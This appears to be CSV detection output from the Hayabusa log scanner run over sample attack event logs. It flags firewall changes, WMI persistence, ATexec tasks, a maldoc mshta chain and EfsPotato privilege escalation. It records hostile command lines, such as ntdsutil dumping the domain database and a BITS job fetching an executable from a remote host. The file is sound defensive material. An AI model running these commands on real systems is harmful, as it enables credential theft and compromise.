2021-06-04 04:39:52.893 +09:00,fs01.offsec.lan,2003,low,,Setting Change in Windows Firewall with Advanced Security,,rules/sigma/builtin/firewall_as/win_firewall_as_setting_change.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID2003-4950-Firewall disabled.evtx
2021-06-04 04:39:52.895 +09:00,fs01.offsec.lan,2003,low,,Setting Change in Windows Firewall with Advanced Security,,rules/sigma/builtin/firewall_as/win_firewall_as_setting_change.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID2003-4950-Firewall disabled.evtx
2021-06-04 04:39:53.056 +09:00,fs01.offsec.lan,2003,low,,Setting Change in Windows Firewall with Advanced Security,,rules/sigma/builtin/firewall_as/win_firewall_as_setting_change.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID2003-4950-Firewall disabled.evtx
2021-06-04 17:41:47.982 +09:00,exchange01.offsec.lan,6,high,Persis,Failed MSExchange Transport Agent Installation,,rules/sigma/builtin/msexchange/win_exchange_transportagent_failed.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1505-Server Software Component/ID6-Failed to install an Exchange transport agent.evtx
2021-06-04 17:41:48.041 +09:00,exchange01.offsec.lan,6,high,Persis,Failed MSExchange Transport Agent Installation,,rules/sigma/builtin/msexchange/win_exchange_transportagent_failed.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1505-Server Software Component/ID6-Failed to install an Exchange transport agent.evtx
2021-06-04 18:30:48.170 +09:00,exchange01.offsec.lan,11,info,,File Created,Path: E:\Exchange2016\TransportRoles\Shared\agents.config | Process: C:\Program Files (x86)\Notepad++\notepad++.exe | PID: 19108 | PGUID: 6D3C60FE-F13D-60B9-22E2-010000001D00,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1505-Server Software Component/ID11-Exchange transport config modified.evtx
2021-06-06 04:35:16.721 +09:00,rootdc1.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: ntdsutil.exe 'ac i ntds' 'ifm' 'create full c:\hacker' q q | Path: C:\Windows\System32\ntdsutil.exe | PID: 0x724 | User: admmig | LID: 0xa8a1627a,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4688-IFM created.evtx
2021-06-06 04:36:32.683 +09:00,rootdc1.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ntdsutil ""activate instance ntds"" ifm ""create full c:\hacker"" quit quit | Path: C:\Windows\System32\ntdsutil.exe | PID: 0x1bec | User: admmig | LID: 0xa8a1627a",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4688-IFM created.evtx
2021-06-06 05:17:05.433 +09:00,rootdc1.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: diskshadow.exe /s shadow.txt | Path: C:\Windows\System32\diskshadow.exe | PID: 0xda8 | User: admmig | LID: 0xa8a1627a,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4688-Diskshadow abuse.evtx
2021-06-10 04:29:58.239 +09:00,fs01.offsec.lan,20,medium,,WMI Event Consumer Activity,"technique_id=T1047,technique_name=Windows Management Instrumentation | Created | Type: Command Line | Name: ""Evil"" | Dst: ""cmd.exe /c echo %ProcessId% >> c:\\\\temp\\\\log.txt"" | User: OFFSEC\admmig",rules/hayabusa/sysmon/alerts/20_WmiEventConsumerActivity_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1546-Event Triggered Execution/ID19-20-WMI registration via PowerLurk.evtx
2021-06-10 04:29:58.240 +09:00,fs01.offsec.lan,19,medium,,WMI Event Filter Activity_Sysmon Alert,"technique_id=T1047,technique_name=Windows Management Instrumentation | Created | Namespace: ""root/cimv2"" | Name: ""Evil"" | Query: ""SELECT * FROM Win32_ProcessStartTrace WHERE ProcessName='notepad.exe'"" | User: OFFSEC\admmig",rules/hayabusa/sysmon/alerts/19_WmiEventFilterActivity_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1546-Event Triggered Execution/ID19-20-WMI registration via PowerLurk.evtx
2021-06-10 04:29:58.392 +09:00,fs01.offsec.lan,19,medium,,WMI Event Filter Activity_Sysmon Alert,"technique_id=T1047,technique_name=Windows Management Instrumentation | Created | Namespace: ""root/cimv2"" | Name: ""Evil"" | Query: ""SELECT * FROM Win32_ProcessStartTrace WHERE ProcessName='notepad.exe'"" | User: OFFSEC\admmig",rules/hayabusa/sysmon/alerts/19_WmiEventFilterActivity_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1546-Event Triggered Execution/ID19-20-WMI registration via PowerLurk.evtx
2021-06-11 06:21:20.636 +09:00,fs01.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.23.9 | LID: 0x5a4175e,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,4698,4699,5145,4624-ATexec remote trask creation (GLOBAL).evtx"
2021-06-11 06:21:26.357 +09:00,fs01.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.123.11 | LID: 0x5a41984,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,4698,4699,5145,4624-ATexec remote trask creation (GLOBAL).evtx"
2021-06-11 06:21:26.357 +09:00,fs01.offsec.lan,4624,medium,LatMov,Pass the Hash Activity 2,,rules/sigma/builtin/security/win_pass_the_hash_2.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,4698,4699,5145,4624-ATexec remote trask creation (GLOBAL).evtx"
2021-06-11 06:21:26.390 +09:00,fs01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: cmd.exe /C whoami > C:\Windows\Temp\bouWFQYO.tmp 2>&1 | Path: C:\Windows\System32\cmd.exe | PID: 0x3d0 | User: FS01$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,4698,4699,5145,4624-ATexec remote trask creation (GLOBAL).evtx"
2021-06-11 06:21:26.406 +09:00,fs01.offsec.lan,4699,medium,Exec | PrivEsc,Scheduled Task Deletion,,rules/sigma/builtin/security/win_scheduled_task_deletion.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1053.005-Scheduled Task/ID4698-4699-Fast created & deleted task by ATexec (susp. arg.).evtx
2021-06-11 06:21:26.406 +09:00,fs01.offsec.lan,4699,medium,Exec | PrivEsc,Scheduled Task Deletion,,rules/sigma/builtin/security/win_scheduled_task_deletion.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,4698,4699,5145,4624-ATexec remote trask creation (GLOBAL).evtx"
2021-06-11 06:21:26.415 +09:00,fs01.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | Path: Temp\bouWFQYO.tmp | IP Addr: 10.23.123.11 | LID: 0x5a41984,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1053.005-Scheduled Task/ID5145-Remote schedule task creation (ATexec).evtx
2021-06-11 06:21:26.415 +09:00,fs01.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | Path: Temp\bouWFQYO.tmp | IP Addr: 10.23.123.11 | LID: 0x5a41984,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,4698,4699,5145,4624-ATexec remote trask creation (GLOBAL).evtx"
2021-06-11 06:21:29.427 +09:00,fs01.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | Path: Temp\bouWFQYO.tmp | IP Addr: 10.23.123.11 | LID: 0x5a41984,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1053.005-Scheduled Task/ID5145-Remote schedule task creation (ATexec).evtx
2021-06-11 06:21:29.427 +09:00,fs01.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | Path: Temp\bouWFQYO.tmp | IP Addr: 10.23.123.11 | LID: 0x5a41984,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,4698,4699,5145,4624-ATexec remote trask creation (GLOBAL).evtx"
2021-06-11 06:21:29.441 +09:00,fs01.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | Path: Temp\bouWFQYO.tmp | IP Addr: 10.23.123.11 | LID: 0x5a41984,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1053.005-Scheduled Task/ID5145-Remote schedule task creation (ATexec).evtx
2021-06-11 06:21:29.441 +09:00,fs01.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | Path: Temp\bouWFQYO.tmp | IP Addr: 10.23.123.11 | LID: 0x5a41984,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,4698,4699,5145,4624-ATexec remote trask creation (GLOBAL).evtx"
2021-06-13 15:17:18.087 +09:00,sv-dc.hinokabegakure-no-sato.local,59,info,Evas | Persis,Bits Job Created,Job Title: test | URL: http://192.168.10.254:80/calc.exe,rules/hayabusa/default/events/BitsClient_Operational/59_BITS-Jobs_BitsJobCreated.yml,../hayabusa-sample-evtx/YamatoSecurity/T1197_BITS Jobs/Windows-BitsClient.evtx
2021-08-08 08:32:57.348 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Program Files\Microsoft Office\Office14\WINWORD.EXE"" /n ""C:\Users\IEUser\Desktop\stats.doc"" | Process: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: C:\Windows\Explorer.EXE | LID: 0x7a857 | PID: 3424 | PGUID: 747F3D96-1829-610F-0000-0010A33FD200",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Other/maldoc_mshta_via_shellbrowserwind_rundll32.evtx
2021-08-08 08:33:01.103 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\SysWOW64\mshta.exe"" ""C:\Users\Public\memViewData.hta"" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5} | Process: C:\Windows\SysWOW64\mshta.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: C:\Windows\Explorer.EXE | LID: 0x7a857 | PID: 9932 | PGUID: 747F3D96-182D-610F-0000-00106F40D300",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Other/maldoc_mshta_via_shellbrowserwind_rundll32.evtx
2021-08-08 08:33:01.103 +09:00,MSEDGEWIN10,1,high,Exec,Suspicious MSHTA Process Patterns,,rules/sigma/process_creation/proc_creation_win_susp_mshta_pattern.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Other/maldoc_mshta_via_shellbrowserwind_rundll32.evtx
2021-08-08 08:33:01.103 +09:00,MSEDGEWIN10,1,high,Evas | Exec,MSHTA Suspicious Execution 01,,rules/sigma/process_creation/proc_creation_win_susp_mshta_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Other/maldoc_mshta_via_shellbrowserwind_rundll32.evtx
2021-08-08 08:33:01.176 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Windows\system32\svchost.exe -k LocalService -p -s fdPHost | Process: C:\Windows\System32\svchost.exe | User: NT AUTHORITY\LOCAL SERVICE | Parent Cmd: ? | LID: 0x3e5 | PID: 11196 | PGUID: 747F3D96-182D-610F-0000-00100344D300,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Other/maldoc_mshta_via_shellbrowserwind_rundll32.evtx
2021-08-08 08:33:01.176 +09:00,MSEDGEWIN10,1,low,Evas,Windows Processes Suspicious Parent Directory,,rules/sigma/process_creation/proc_creation_win_proc_wrong_parent.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Other/maldoc_mshta_via_shellbrowserwind_rundll32.evtx
2021-08-08 08:33:01.176 +09:00,MSEDGEWIN10,1,high,Evas,Suspicious Svchost Process,,rules/sigma/process_creation/proc_creation_win_susp_svchost.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Other/maldoc_mshta_via_shellbrowserwind_rundll32.evtx
2021-08-08 08:33:08.346 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\System32\rundll32.exe"" c:\users\public\memViewData.jpg,PluginInit | Process: C:\Windows\SysWOW64\rundll32.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\SysWOW64\mshta.exe"" ""C:\Users\Public\memViewData.hta"" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5} | LID: 0x7a857 | PID: 6576 | PGUID: 747F3D96-1834-610F-0000-00105FE5D300",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Other/maldoc_mshta_via_shellbrowserwind_rundll32.evtx
2021-08-08 08:33:08.346 +09:00,MSEDGEWIN10,1,high,,Application Executed Non-Executable Extension,,rules/sigma/process_creation/proc_creation_win_run_executable_invalid_extension.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Other/maldoc_mshta_via_shellbrowserwind_rundll32.evtx
2021-08-08 08:33:15.303 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: cmd /c start /min C:\Users\Public\KDECO.bat reg delete hkcu\Environment /v windir /f && REM \system32\AppHostRegistrationVerifier.exe | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ? | LID: 0x7a857 | PID: 11324 | PGUID: 747F3D96-183B-610F-0000-0010DC6CD400,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Other/maldoc_mshta_via_shellbrowserwind_rundll32.evtx
2021-08-08 08:33:15.303 +09:00,MSEDGEWIN10,1,low,Disc,Local Accounts Discovery,,rules/sigma/process_creation/proc_creation_win_local_system_owner_account_discovery.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Other/maldoc_mshta_via_shellbrowserwind_rundll32.evtx
2021-08-17 21:26:51.403 +09:00,LAPTOP-JU4M3I0E,16,medium,Evas,Sysmon Configuration Change,,rules/sigma/sysmon/sysmon_config_modification.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_PetiPotam_etw_rpc_efsr_5_6.evtx
2021-08-17 21:26:51.457 +09:00,LAPTOP-JU4M3I0E,16,medium,Evas,Sysmon Configuration Change,,rules/sigma/sysmon/sysmon_config_modification.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_PetiPotam_etw_rpc_efsr_5_6.evtx
2021-08-23 04:33:38.725 +09:00,LAPTOP-JU4M3I0E,1,info,,Process Created,"Cmd: c:\temp\EfsPotato.exe whoami | Process: C:\temp\EfsPotato.exe | User: NT AUTHORITY\NETWORK SERVICE | Parent Cmd: ""cmd.exe"" | LID: 0x3e4 | PID: 14048 | PGUID: 00247C92-A691-6122-0000-001021C31F02",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/EfsPotato_sysmon_17_18_privesc_seimpersonate_to_system.evtx
2021-08-23 04:33:38.725 +09:00,LAPTOP-JU4M3I0E,1,low,Exec,Process Start From Suspicious Folder,,rules/sigma/process_creation/proc_creation_win_susp_run_folder.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/EfsPotato_sysmon_17_18_privesc_seimpersonate_to_system.evtx
2021-08-23 04:33:38.844 +09:00,LAPTOP-JU4M3I0E,17,info,,Pipe Created,\dd4c18dc-bff6-42ce-b707-62c114b84291\pipe\srvsvc | Process: c:\temp\EfsPotato.exe | PID: 14048 | PGUID: 00247C92-A691-6122-0000-001021C31F02,rules/hayabusa/sysmon/events/17_PipeCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/EfsPotato_sysmon_17_18_privesc_seimpersonate_to_system.evtx
2021-08-23 04:33:38.844 +09:00,LAPTOP-JU4M3I0E,17,critical,Evas | PrivEsc,EfsPotato Named Pipe,,rules/sigma/pipe_created/sysmon_efspotato_namedpipe.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/EfsPotato_sysmon_17_18_privesc_seimpersonate_to_system.evtx
2021-08-23 04:33:38.881 +09:00,LAPTOP-JU4M3I0E,18,info,,Pipe Connected,\lsass | Process: System | PID: 4 | PGUID: 00247C92-707C-6122-0000-0010EB030000,rules/hayabusa/sysmon/events/18_PipeConnected.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/EfsPotato_sysmon_17_18_privesc_seimpersonate_to_system.evtx
2021-08-23 04:33:38.884 +09:00,LAPTOP-JU4M3I0E,18,info,,Pipe Connected,\dd4c18dc-bff6-42ce-b707-62c114b84291\pipe\srvsvc | Process: System | PID: 4 | PGUID: 00247C92-707C-6122-0000-0010EB030000,rules/hayabusa/sysmon/events/18_PipeConnected.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/EfsPotato_sysmon_17_18_privesc_seimpersonate_to_system.evtx
2021-08-23 04:33:38.884 +09:00,LAPTOP-JU4M3I0E,18,critical,Evas | PrivEsc,EfsPotato Named Pipe,,rules/sigma/pipe_created/sysmon_efspotato_namedpipe.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/EfsPotato_sysmon_17_18_privesc_seimpersonate_to_system.evtx
2021-08-23 04:33:38.905 +09:00,LAPTOP-JU4M3I0E,1,info,,Process Created,Cmd: whoami | Process: C:\Windows\System32\whoami.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: c:\temp\EfsPotato.exe whoami | LID: 0x3e7 | PID: 11328 | PGUID: 00247C92-A692-6122-0000-0010A5CD1F02,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/EfsPotato_sysmon_17_18_privesc_seimpersonate_to_system.evtx
2021-08-23 04:33:38.905 +09:00,LAPTOP-JU4M3I0E,1,low,Disc,Local Accounts Discovery,,rules/sigma/process_creation/proc_creation_win_local_system_owner_account_discovery.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/EfsPotato_sysmon_17_18_privesc_seimpersonate_to_system.evtx
2021-08-23 04:33:38.905 +09:00,LAPTOP-JU4M3I0E,1,high,Disc,Whoami Execution Anomaly,,rules/sigma/process_creation/proc_creation_win_susp_whoami_anomaly.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/EfsPotato_sysmon_17_18_privesc_seimpersonate_to_system.evtx
2021-08-23 04:33:38.905 +09:00,LAPTOP-JU4M3I0E,1,high,PrivEsc | Disc,Run Whoami as SYSTEM,,rules/sigma/process_creation/proc_creation_win_whoami_as_system.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/EfsPotato_sysmon_17_18_privesc_seimpersonate_to_system.evtx
2021-08-23 04:33:38.905 +09:00,LAPTOP-JU4M3I0E,1,medium,Disc,Whoami Execution,,rules/sigma/process_creation/proc_creation_win_susp_whoami.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/EfsPotato_sysmon_17_18_privesc_seimpersonate_to_system.evtx
2021-08-23 04:33:38.997 +09:00,LAPTOP-JU4M3I0E,5,info,,Process Terminated,Process: C:\temp\EfsPotato.exe | PID: 14048 | PGUID: 00247C92-A691-6122-0000-001021C31F02,rules/hayabusa/sysmon/events/5_ProcessTerminated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/EfsPotato_sysmon_17_18_privesc_seimpersonate_to_system.evtx
2021-08-23 04:33:40.014 +09:00,LAPTOP-JU4M3I0E,3,info,,Network Connection,tcp | Src: 0:0:0:0:0:0:0:1:53686 (LAPTOP-JU4M3I0E) | Dst: 0:0:0:0:0:0:0:1:445 (LAPTOP-JU4M3I0E) | User: NT AUTHORITY\SYSTEM | Process: System | PID: 4 | PGUID: 00247C92-707C-6122-0000-0010EB030000,rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/EfsPotato_sysmon_17_18_privesc_seimpersonate_to_system.evtx
2021-08-23 04:33:40.014 +09:00,LAPTOP-JU4M3I0E,3,info,,Network Connection,tcp | Src: 0:0:0:0:0:0:0:1:53686 (LAPTOP-JU4M3I0E) | Dst: 0:0:0:0:0:0:0:1:445 (LAPTOP-JU4M3I0E) | User: NT AUTHORITY\SYSTEM | Process: System | PID: 4 | PGUID: 00247C92-707C-6122-0000-0010EB030000,rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/EfsPotato_sysmon_17_18_privesc_seimpersonate_to_system.evtx
2021-08-23 04:33:52.250 +09:00,LAPTOP-JU4M3I0E,1,info,,Process Created,"Cmd: ""C:\Users\bouss\AppData\Local\Microsoft\OneDrive\21.139.0711.0001\FileCoAuth.exe"" -Embedding | Process: C:\Users\bouss\AppData\Local\Microsoft\OneDrive\21.139.0711.0001\FileCoAuth.exe | User: LAPTOP-JU4M3I0E\bouss | Parent Cmd: C:\WINDOWS\system32\svchost.exe -k DcomLaunch -p | LID: 0xbf9eb | PID: 15488 | PGUID: 00247C92-A6A0-6122-0000-00102F592002",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/EfsPotato_sysmon_17_18_privesc_seimpersonate_to_system.evtx
2021-08-23 04:33:52.303 +09:00,LAPTOP-JU4M3I0E,7,low,,Image Loaded_Sysmon Alert,"Execution - Image Loaded from suspicious path | Image: C:\Users\bouss\AppData\Local\Microsoft\OneDrive\21.139.0711.0001\vcruntime140_1.dll | Process: C:\Users\bouss\AppData\Local\Microsoft\OneDrive\21.139.0711.0001\FileCoAuth.exe | Company: Microsoft Corporation | Signed: true | Signature: Valid | PID: 15488 | PGUID: 00247C92-A6A0-6122-0000-00102F592002 | Hash: SHA1=58D562E8E3496A97E0CFE34C64B7AC79F40A9367,MD5=639584D9FCDC54D7644328650028F453,SHA256=4EF85487DE3B07AB52D269A51CFC2499C2E77ECBE2C63EC556F2C59AAD311B81,IMPHASH=AE0BDE6314FA2027B54CE04898F6AB69",rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/EfsPotato_sysmon_17_18_privesc_seimpersonate_to_system.evtx
2021-08-23 04:33:52.315 +09:00,LAPTOP-JU4M3I0E,7,low,,Image Loaded_Sysmon Alert,"Execution - Image Loaded from suspicious path | Image: C:\Users\bouss\AppData\Local\Microsoft\OneDrive\21.139.0711.0001\UpdateRingSettings.dll | Process: C:\Users\bouss\AppData\Local\Microsoft\OneDrive\21.139.0711.0001\FileCoAuth.exe | Company: Microsoft Corporation | Signed: true | Signature: Valid | PID: 15488 | PGUID: 00247C92-A6A0-6122-0000-00102F592002 | Hash: SHA1=50FBFD34BCB3A0CDCAE94D963AF6DA5B6EAAF702,MD5=E5783051077ECC0CF81051ACC6C7872D,SHA256=8E63CC1DDD7C554532FB00A2E3198D712ED19DD64EF6818119AFC2A5214148A8,IMPHASH=8B31BD73AB0C52BD4506C09FDABE59CE",rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/EfsPotato_sysmon_17_18_privesc_seimpersonate_to_system.evtx
2021-08-23 04:33:52.324 +09:00,LAPTOP-JU4M3I0E,7,low,,Image Loaded_Sysmon Alert,"Execution - Image Loaded from suspicious path | Image: C:\Users\bouss\AppData\Local\Microsoft\OneDrive\21.139.0711.0001\LoggingPlatform.dll | Process: C:\Users\bouss\AppData\Local\Microsoft\OneDrive\21.139.0711.0001\FileCoAuth.exe | Company: Microsoft Corporation | Signed: true | Signature: Valid | PID: 15488 | PGUID: 00247C92-A6A0-6122-0000-00102F592002 | Hash: SHA1=479CD840A5352F76051B5722E4CD9004C72567EC,MD5=090BBA421A213F67FBFE10231116E008,SHA256=1E8923D71C32876B53A887983C63BC94914AB91CAAF1E13D3979F64F529DD043,IMPHASH=D39A0141F3324CB1CE047427FD20FCEA",rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/EfsPotato_sysmon_17_18_privesc_seimpersonate_to_system.evtx
2021-08-23 04:33:52.335 +09:00,LAPTOP-JU4M3I0E,7,low,,Image Loaded_Sysmon Alert,"Execution - Image Loaded from suspicious path | Image: C:\Users\bouss\AppData\Local\Microsoft\OneDrive\21.139.0711.0001\msvcp140.dll | Process: C:\Users\bouss\AppData\Local\Microsoft\OneDrive\21.139.0711.0001\FileCoAuth.exe | Company: Microsoft Corporation | Signed: true | Signature: Valid | PID: 15488 | PGUID: 00247C92-A6A0-6122-0000-00102F592002 | Hash: SHA1=6648A614B14F15ECB522A6D2BDF5E5031417742F,MD5=5BEB853A59982A96052364AB7BDE8D20,SHA256=CEACFE080276ACDF3FF731A8CA68140BCF589CEB1E3DD7544E0D4765E0489D9E,IMPHASH=4F1912F58F8D1AE7998EF5303198D62D",rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/EfsPotato_sysmon_17_18_privesc_seimpersonate_to_system.evtx
2021-08-23 04:33:52.342 +09:00,LAPTOP-JU4M3I0E,7,low,,Image Loaded_Sysmon Alert,"Execution - Image Loaded from suspicious path | Image: C:\Users\bouss\AppData\Local\Microsoft\OneDrive\21.139.0711.0001\vcruntime140.dll | Process: C:\Users\bouss\AppData\Local\Microsoft\OneDrive\21.139.0711.0001\FileCoAuth.exe | Company: Microsoft Corporation | Signed: true | Signature: Valid | PID: 15488 | PGUID: 00247C92-A6A0-6122-0000-00102F592002 | Hash: SHA1=344B09330D8CC196728BC4320194FE49993D3A2C,MD5=B3FF2F3D0040F23F36E9F2A3444F42EA,SHA256=3A8DAE539BB91C950CCD6EA244D5C09CDF44AEBC8EE4FF9C5094D5195F40E82A,IMPHASH=44C3854843F7A3FCCDF8DDBBEA66F302",rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/EfsPotato_sysmon_17_18_privesc_seimpersonate_to_system.evtx
